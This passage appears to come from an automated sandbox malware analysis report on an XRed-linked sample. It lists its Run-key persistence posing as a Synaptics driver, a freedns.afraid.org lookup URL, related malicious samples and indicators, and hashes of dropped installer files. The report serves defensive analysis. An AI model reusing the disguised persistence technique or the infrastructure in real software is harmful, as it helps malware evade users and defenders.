                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdwus22.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 7712 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                        • VT rate limit hit for: file.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        14:29:35API Interceptor381x Sleep call for process: Synaptics.exe modified
                                                                        14:29:48API Interceptor1327237x Sleep call for process: splwow64.exe modified
                                                                        14:29:51API Interceptor1x Sleep call for process: wordpad.exe modified
                                                                        14:30:27API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                        19:29:29AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        69.42.215.252file.exeGet hashmaliciousXRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        xyxmml.msiGet hashmaliciousXRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                        valyzt.msiGet hashmaliciousXRedBrowse
                                                                        • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousXRedBrowse
                                                                        • 13.107.246.45
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 13.107.246.45
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 13.107.246.45
                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                        • 13.107.246.45
                                                                        file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                        • 13.107.246.45
                                                                        https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
                                                                        • 13.107.246.45
                                                                        Bootxr.exeGet hashmaliciousXmrigBrowse
                                                                        • 13.107.246.45
                                                                        cici.exeGet hashmaliciousRedLineBrowse
                                                                        • 13.107.246.45
                                                                        intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                        • 13.107.246.45
                                                                        random(6).exeGet hashmaliciousStealcBrowse
                                                                        • 13.107.246.45
                                                                        freedns.afraid.orgfile.exeGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                        • 69.42.215.252
                                                                        Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        xyxmml.msiGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        valyzt.msiGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        AWKNET-LLCUSfile.exeGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                        • 69.42.215.252
                                                                        Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                        • 69.42.215.252
                                                                        xyxmml.msiGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252
                                                                        valyzt.msiGet hashmaliciousXRedBrowse
                                                                        • 69.42.215.252

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousXRedBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        45631.exeGet hashmaliciousNitolBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14
                                                                        45631.exeGet hashmaliciousUnknownBrowse
                                                                        • 216.58.206.65
                                                                        • 172.217.18.14

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dllAuu2j0pT0B.exeGet hashmaliciousUnknownBrowse
                                                                          WIN_SCM_RDM_INSTALL_4.0.4.0.EXEGet hashmaliciousUnknownBrowse
                                                                            WIN_SCM_RDM_INSTALL_4.0.4.0.EXEGet hashmaliciousUnknownBrowse
                                                                              https://storage.googleapis.com/vectric_public/Cut2DDesktopTrialEdition_Setup.exeGet hashmaliciousUnknownBrowse
                                                                                https://download.info.apple.com/Mac_OS_X/031-30890-20150812-ea191174-4130-11e5-a125-930911ba098f/bootcamp5.1.5769.zipGet hashmaliciousUnknownBrowse
                                                                                  Kiwi_Syslog_Server_9.8.2.Freeware.setup.exeGet hashmaliciousUnknownBrowse
                                                                                    ESjy0irMIn.exeGet hashmaliciousNjratBrowse
                                                                                      dotNetFx40_Full_setup.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                        Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exeGet hashmaliciousUnknownBrowse
                                                                                          http://download.arxivar.it/Tools/Prerequisiti/vcredist_x86_2010.zipGet hashmaliciousUnknownBrowse

                                                                                            Created / dropped Files

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1028\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (388), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):30672
                                                                                            Entropy (8bit):4.293519557838441
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4Y2C7xDsxgg8MPN9AYy50keJzH7o3oDPnv:cxTJz7
                                                                                            MD5:12DF3535E4C4EF95A8CB03FD509B5874
                                                                                            SHA1:90B1F87BA02C1C89C159EBF0E1E700892B85DC39
                                                                                            SHA-256:1C8132747DC33CCDB02345CBE706E65089A88FE32CF040684CA0D72BB9105119
                                                                                            SHA-512:C6C8887E7023C4C1CBF849EEBD17B6AD68FC14607D1C32C0D384F951E07BFAF6B61E0639F4E5978C9E3E1D52EF8A383B62622018A26FA4066EB620F584030808
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....P.[..z._.... .x.6.4. .s^.S..!q.l.[.(W...Ps^.S.N.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....P.[..z._.... .I.A.6.4. .s^.S..!q.l.[.(W...Ps^.S.N.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....P\Omi.|q}.N/e.c .M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.0. ..SI.ce|vWY.N.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14168
                                                                                            Entropy (8bit):5.9724110685335825
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                                                            MD5:7C136B92983CEC25F85336056E45F3E8
                                                                                            SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                                                            SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                                                            SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Auu2j0pT0B.exe, Detection: malicious, Browse
                                                                                            • Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious, Browse
                                                                                            • Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            • Filename: Kiwi_Syslog_Server_9.8.2.Freeware.setup.exe, Detection: malicious, Browse
                                                                                            • Filename: ESjy0irMIn.exe, Detection: malicious, Browse
                                                                                            • Filename: dotNetFx40_Full_setup.exe, Detection: malicious, Browse
                                                                                            • Filename: Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe, Detection: malicious, Browse
                                                                                            • Filename: , Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@......E.....@.......................................... ..X............ ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1028\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):188446
                                                                                            Entropy (8bit):4.98936861773382
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:vjB8N7T+SN6FY5PmQlivKawlrIMUkYfkv8CshgJNgRJAoJvIrOJBElrhzxQXK6uG:o7SSN6FYtmQlivKawlrIMUkYfkv8Cs4U
                                                                                            MD5:129D8E8824B0D545ADC29E571A6E2C02
                                                                                            SHA1:5A1DDFCD2AE21D96C818D315CB5E263F525A39CD
                                                                                            SHA-256:83B8268E2874699227F9B1AD3F72A06CBF474EFA3983F5C5EE9BFE415DB98476
                                                                                            SHA-512:1048F646D5866DC8736DB0A023A65A7E208A5F56774FA8EC5D59E4272A54A9A6E94B01B84293A7EC9F889BAD7865522E783AF30BF61BB9249687DCEAC62066D8
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch14\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ???????????????????????????\'a1\'ec???};}{\f14\fbidi \froman\fcharset136\fprq2{\*\panose 02020500000000000000}PMingLiU{\*\falt \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\fa

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1031\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (615), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):41628
                                                                                            Entropy (8bit):3.5773894743757726
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4nh+jpoHHZi8oO0GOJ2+8q6OQzxYJL/ZiITrKv:R03zzOJL/YIy
                                                                                            MD5:B13FF959ADC5C3E9C4BA4C4A76244464
                                                                                            SHA1:4DF793626F41B92A5BC7C54757658CE30FDAEEB1
                                                                                            SHA-256:44945BC0BA4BE653D07F53E736557C51164224C8EC4E4672DFAE1280260BA73B
                                                                                            SHA-512:DE78542D3BBC4C46871A8AFB50FB408A59A76F6ED67E8BE3CBA8BA41724EA08DF36400E233551B329277A7A0FE6168C5556ABE9D9A735F41B29A941250BFC4D6
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.i.e.s.e.s. .S.e.t.u.p.p.r.o.g.r.a.m.m. .e.r.f.o.r.d.e.r.t. .e.i.n.e. .x.6.4.-.P.l.a.t.t.f.o.r.m... .E.s. .k.a.n.n. .n.i.c.h.t. .a.u.f. .d.e.r. .P.l.a.t.t.f.o.r.m. .i.n.s.t.a.l.l.i.e.r.t. .w.e.r.d.e.n..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.i.e.s.e.s. .S.e.t.u.p.p.r.o.g.r.a.m.m. .e.r.f.o.r.d.e.r.t. .e.i.n.e. .I.A.6.4.-.P.l.a.t.t.f.o.r.m... .E.s. .k.a.n.n. .n.i.c.h.t. .a.u.f. .d.e.r. .P.l.a.t.t.f.o.r.m. .i.n.s.t.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18776
                                                                                            Entropy (8bit):5.135663555520085
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lQ16m3rhGrcHN/USYvYVA9WKieW8bLXci2jXHU2Ze:lEhCSVYvYVAA+Mi2jXHU2A
                                                                                            MD5:7C9AE49B3A400C728A55DD1CACC8FFB2
                                                                                            SHA1:DD3A370F541010AD650F4F6AA42E0CFC68A00E66
                                                                                            SHA-256:402C796FEBCD78ACE8F1C5975E39193CFF77F891CFF4D32F463F9A9C83806D4A
                                                                                            SHA-512:D30FE9F78A49C533BE5C00D88B8C2E66A8DFAC6D1EAE94A230CD937F0893F6D4A0EECE59C1D2C3C8126FFA9A9648EC55A94E248CD8C7F9677F45C231F84F221B
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P.......D....@.......................................... ..`+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1031\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):163866
                                                                                            Entropy (8bit):5.029712171633306
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:oiJ+vgRJA8J/snalBEm0OgKXIJR10GZybh2C:aQ
                                                                                            MD5:117DABB5A055B09B6DB6BCBA8F911073
                                                                                            SHA1:E8F5D907939400824CC5DADB681852C35CA7BB79
                                                                                            SHA-256:DAEA9CD8151A2C24A87C3254DEC1DE0463234E44922C8E0AA4E01AB58EC89664
                                                                                            SHA-512:E995D03998BE9F07F9E9B8566E429D3795ADBDEEEFB2048D6B8877CE15A0ABFCE4FAAEE8DC773250495C15CC35FD0040D81593B51067533836D5F3CF8612D3C4
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ???????????????????????????\'a1\'ec???};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}{\f38\fbidi \fswiss\fcharset0\fpr

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1033\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (565), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):39246
                                                                                            Entropy (8bit):3.5443015320810485
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4kV2hG9aXQSDpI53/aQS0WAv+VXxwVcPI/tOiQC4+3bpKQVz5FB0zJOkue6Jjfz3:4M2hJAep4tVNx9SJOkR6NXaxu
                                                                                            MD5:5486FF60B072102EE3231FD743B290A1
                                                                                            SHA1:D8D8A1D6BF6ADF1095158B3C9B0A296A037632D0
                                                                                            SHA-256:5CA3ECAA12CA56F955D403CA93C4CB36A7D3DCDEA779FC9BDAA0CDD429DAB706
                                                                                            SHA-512:AE240EAAC32EDB18FD76982FC01E03BD9C8E40A9EC1B9C42D7EBD225570B7517949E045942DBB9E40E620AA9DCC9FBE0182C6CF207AC0A44D7358AD33BA81472
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.i.s. .s.e.t.u.p. .p.r.o.g.r.a.m. .r.e.q.u.i.r.e.s. .a.n. .x.6.4. .p.l.a.t.f.o.r.m... .I.t. .c.a.n.n.o.t. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .t.h.i.s. .p.l.a.t.f.o.r.m...". ./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.i.s. .s.e.t.u.p. .p.r.o.g.r.a.m. .r.e.q.u.i.r.e.s. .a.n. .I.A.6.4. .p.l.a.t.f.o.r.m... .I.t. .c.a.n.n.o.t. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .t.h.i.s. .p.l.a.t.f.o.r.m...". ./.>..... . . . . . .<.T.e.x.t. .

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):17240
                                                                                            Entropy (8bit):5.151474565875158
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:byk5nUfwTW7JwWp0eW6jp8M+9HS8bC/TJs7kFkzQKPnEtObMacxc8hjeyveCXZBe:pgoTWp0eWB9ygC/TfFkzLXci2jpv8
                                                                                            MD5:9547D24AC04B4D0D1DBF84F74F54FAF7
                                                                                            SHA1:71AF6001C931C3DE7C98DDC337D89AB133FE48BB
                                                                                            SHA-256:36D0159ED1A7D88000737E920375868765C0A1DD6F5A5ACBB79CF7D97D9E7A34
                                                                                            SHA-512:8B6048F4185A711567679E2DE4789407077CE5BFE72102D3CB1F23051B8D3E6BFD5886C801D85B4E62F467DD12DA1C79026A4BC20B17F54C693B2F24E499D40F
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........(...............................................P......<f....@.......................................... ...%...........,..X............................................................................................text...G...........................@..@.rsrc....%... ...&..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1033\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                            Category:dropped
                                                                                            Size (bytes):7080
                                                                                            Entropy (8bit):4.934776172726828
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:9fcddvfbS9u6zZ+kodpj4eQ1lhcgi5X90vJqpsSih2:y/fbSZ/odpjmlhcgi5NSkRA2
                                                                                            MD5:19D028345AADCC05697EEC6D8C5B5874
                                                                                            SHA1:70BD3D4D51373FB82F0257F28D5F3609BFC82520
                                                                                            SHA-256:F4FF4EACE31B75176A0806E1693041D546D2599AEC0C77D295BAD09CAC7D9FE7
                                                                                            SHA-512:9B3DFFEC7C1595197AF69E59094588541558BEF56982475DDDD2C9E3D75FC8B970B384452713632AE20435EC0CAEC6CC4CD8CEC9CD4B4809335FDC9F2CC7B842
                                                                                            Malicious:false
